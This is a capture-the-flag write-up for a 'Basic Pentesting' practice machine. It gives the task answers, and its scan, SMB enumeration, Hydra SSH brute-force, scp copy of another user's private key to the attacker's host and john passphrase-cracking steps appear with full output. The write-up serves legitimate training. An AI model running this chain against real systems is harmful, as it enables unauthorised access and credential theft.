This is a machine that allows you to practise web app hacking and privilege escalation
In these set of tasks you'll learn the following:
- brute forcing
- hash cracking
- service enumeration
- Linux Enumeration
The main goal here is to learn as much as possible. Make sure you are connected to our network using your OpenVPN configuration file.
Credits to Josiah Pierce from Vulnhub.
No answer needed
No answer needed
What is the name of the hidden directory on the web server(enter name without /)?
development
No answer needed
jan
armando
SSH
No answer needed
kay
No answer needed
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
$ sudo nmap 10.10.50.222 -sV -p- -A -sS -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-04 21:36 IST
Nmap scan report for 10.10.50.222
Host is up (0.17s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.4
OS details: Linux 5.4
Network Distance: 5 hops
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2024-04-04T12:16:59-04:00
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-04-04T16:16:59
|_ start_date: N/A
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
TRACEROUTE (using port 23/tcp)
HOP RTT ADDRESS
1 33.51 ms 10.17.0.1
2 ... 4
5 174.68 ms 10.10.50.222
sudo apt install dirsearch -y
$ dirsearch -u 10.10.50.222
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /home/death/Lab-CTF/Basic-pentesting/reports/_10.10.50.222/_24-04-04_20-30-34.txt
Target: http://10.10.50.222/
[20:30:34] Starting:
[20:30:43] 403 - 298B - /.ht_wsr.txt
[20:30:43] 403 - 301B - /.htaccess.save
[20:30:43] 403 - 303B - /.htaccess.sample
[20:30:43] 403 - 301B - /.htaccess.bak1
[20:30:43] 403 - 301B - /.htaccess.orig
[20:30:43] 403 - 302B - /.htaccess_extra
[20:30:43] 403 - 300B - /.htaccessOLD2
[20:30:43] 403 - 299B - /.htaccessBAK
[20:30:43] 403 - 299B - /.htaccess_sc
[20:30:43] 403 - 301B - /.htaccess_orig
[20:30:43] 403 - 299B - /.htaccessOLD
[20:30:43] 403 - 291B - /.htm
[20:30:43] 403 - 292B - /.html
[20:30:43] 403 - 301B - /.htpasswd_test
[20:30:43] 403 - 297B - /.htpasswds
[20:30:43] 403 - 298B - /.httr-oauth
[20:31:23] 200 - 475B - /development/ -------------> this is with 200 code only
[20:31:57] 403 - 300B - /server-status
[20:31:57] 403 - 301B - /server-status/
Task Completed
The message -k passing to -j about config of SMB and Apache maybe k and j are user. let open another.
Again k passing message to J about /etc/shadow have weak credentials and they are easily crackable hashes.
sudo apt install smbclient -y [ -L ] option use below is for mapping
$ smbclient -L 10.10.50.222
Password for [WORKGROUP\death]:
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP BASIC2
$ smbclient //10.10.50.222/Anonymous
Password for [WORKGROUP\death]:
Try "help" to get a list of possible commands.
smb: \>
$ smbclient //10.10.50.222/Anonymous
Password for [WORKGROUP\death]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Apr 19 23:01:20 2018
.. D 0 Thu Apr 19 22:43:06 2018
staff.txt N 173 Thu Apr 19 22:59:55 2018
14318640 blocks of size 1024. 11087940 blocks available
smb: \>
get command use to download file
$ smbclient //10.10.50.222/Anonymous
Password for [WORKGROUP\death]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Apr 19 23:01:20 2018
.. D 0 Thu Apr 19 22:43:06 2018
staff.txt N 173 Thu Apr 19 22:59:55 2018
14318640 blocks of size 1024. 11087940 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> $ cat staff.txt
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kaysudo apt install hydra -y
$ hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.50.222 -t 50
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-04 22:19:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 50 tasks per 1 server, overall 50 tasks, 14344399 login tries (l:1/p:14344399), ~286888 tries per task
[DATA] attacking ssh://10.10.50.222:22/
[STATUS] 390.00 tries/min, 390 tries in 00:01h, 14344028 to do in 612:60h, 31 active
[STATUS] 229.67 tries/min, 689 tries in 00:03h, 14343733 to do in 1040:55h, 27 active
[22][ssh] host: 10.10.50.222 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 23 final worker threads did not complete until end.
[ERROR] 23 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-04 22:22:17I got password armando, So there is no firewall to block me doing bruteforce im sending 50 threads at once to fast this process
$ ssh jan@10.10.50.222
The authenticity of host '10.10.50.222 (10.10.50.222)' can't be established.
ED25519 key fingerprint is SHA256:XKjDkLKocbzjCch0Tpriw1PeLPuzDufTGZa4xMDA+o4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.50.222' (ED25519) to the list of known hosts.
jan@10.10.50.222's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102
jan@basic2:~$ jan@basic2:~$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 root jan 47 Apr 23 2018 .lesshstjan@basic2:~$ cd /home
jan@basic2:/home$ ls
jan kay
jan@basic2:/home$ jan@basic2:/home$ cd kay
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
jan@basic2:/home/kay$
jan@basic2:/home/kay$ cd .ssh
jan@basic2:/home/kay/.ssh$ ls -la
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 ..
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
jan@basic2:/home/kay/.ssh$ sudo apt install openssh-client
$ sudo service ssh start
jan@basic2:/home/kay/.ssh$ scp id_rsa death@10.17.120.99:/home/death/Lab-CTF/Basic-pentesting/
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.17.120.99 (10.17.120.99)' can't be established.
ECDSA key fingerprint is SHA256:/buBatPVxdzFYyMDbKFqcBZbNSdBI/cZQ7WxNYDuVLE.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
death@10.17.120.99's password:
id_rsa 100% 3326 3.3KB/s 00:00
jan@basic2:/home/kay/.ssh$ sudo apt install john -y
$ ssh2john id_rsa > rsa$ john rsa -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (id_rsa)
1g 0:00:00:00 DONE (2024-04-04 23:08) 12.50g/s 1035Kp/s 1035Kc/s 1035KC/s bird..aries13
Use the "--show" option to display all of the cracked passwords reliably
Session completed. $ chmod 600 id_rsa$ ssh kay@10.10.50.222 -i id_rsa
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$ kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$